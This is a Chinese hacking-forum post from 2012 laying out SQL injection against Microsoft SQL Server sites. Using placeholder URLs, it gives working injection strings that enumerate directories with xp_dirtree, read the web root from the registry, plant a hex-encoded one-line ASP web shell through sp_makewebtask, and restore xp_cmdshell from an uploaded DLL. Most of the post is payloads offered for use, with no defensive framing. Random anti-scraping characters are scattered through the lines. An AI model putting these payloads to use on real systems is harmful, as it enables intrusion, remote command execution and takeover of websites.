中国网络渗透测试联盟

标题: MSsqlL注入取得网站路径最好的方法 [打印本页]

作者: admin    时间: 2012-9-13 17:20
标题: MSsqlL注入取得网站路径最好的方法
好,我们exec master..xp_dirtree'd:/test'( X% i! q: p# D6 C
假设我们在test里有两个文件夹test1和test2在test1里又有test3
- v, z6 }8 G" j1 ?& }+ e结果显示, y/ V6 g. ~4 {4 G' R+ ^

' i3 @7 ]& D! k" xsubdirectory depth& Y( Q% C& D1 v1 C4 O3 `: l
test1 1
  r: V! T6 M5 Y5 Otest3 2
! S/ n' |8 a1 o8 Y# t9 H& S# Q9 Utest2 14 G. H1 W' ]$ h0 B1 i
9 r% @- O( U( \; x/ v0 g
哈哈发现没有那个depth就是目录的级数
( {& {# ?2 [8 N; n5 N) gok了,知道怎么办了吧
1 j7 C$ P$ C: {: g3 D2 f( }1 h+ Y
http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000),id int)--
) Q0 v, V+ A  z" R( p6 }9 lhttp://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'd:\' --
3 g7 G' R) M% _5 _8 H9 {) `http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where id=1)-) `7 l7 N) `! f' q, l0 \
  e# ]5 g. w* U: o* R1 N8 J( D
只要加上id=1,就是第一级目录 。% Z* M; [+ l8 ~
% B0 q$ b$ y5 K# X

" z1 m3 c0 k8 r/ i通过注册表读网站路径:1 o# i, e5 @/ e' H( S  p. |& z/ x/ \
* ?& I  n5 m) K# F' s
1.;create table [dbo].[cyfd] ([gyfd][char](255));
: q) u5 [8 g4 o1 n! {' k. x/ S6 m8 X/ {, g+ ^
2.DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into 临时表 (临时字段名) values(@result);--
8 c7 @# G! n2 oid=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values(@result);--1 \, t1 c" i, X5 o1 r+ f

9 D4 _! e1 M+ P- Y/ P3.and 1=(select count(*) from 临时表 where 临时字段名>1)2 \# d' {9 l; ?- H
and 1=(select count(*) from cyfd where gyfd > 1)
6 h" I$ _- k6 ]! R这样IE报错,就把刚才插进去的Web路径的值报出来了% \9 G  `1 e: O2 i) P) \; s

- G+ G& j7 g: d0 o2 X4 A& Z# p& Q4.drop table cyfd;-- 删除临时表# o) s  _* Z/ t7 C7 v) B
; j( y1 I( x- P5 T
获得webshell方法:
/ c4 [4 r- c: X, e/ p# H- m, w5 o1.create table cmd (a image)-- \**cmd是创建的临时表6 R* v9 F$ |: `/ x2 A* u

- p. @8 W! S8 p- Q# M3 k2.insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- 往cmd表里插入一句话
* `* `) H6 x+ ~
5 x) k+ Z% u8 O$ N( [' q# a% z7 Z! b- V0 |6 v$ K
3.EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT image FROM cmd'+ x7 Z, |% G2 O$ h
EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'" g' j4 F: w+ J9 c# h6 q4 t
) r9 S5 \1 _, X; m+ d' D0 p/ a6 p
4.drop table cmd;-- 删除cmd临时表
  X/ G8 c$ B: `- S
2 ], v7 g  E/ E3 g. }恢复xp_cmdshell方法之一:. q) K% X( }3 q
我很快就把xplog70.dll文件给他上传到e:\inetpub\wwwroot目录下了,来吧,我们来给他恢复,提交:
# m- n% V9 _* L  S3 X4 M0 hhttp://www.something.com/script.asp?id=2;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetpub\wwwroot\xplog70.dll'5 g8 Q! x  O8 q
恢复,支持绝对路径的恢复哦。:)6 G# b; B  ]# n2 @* n





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2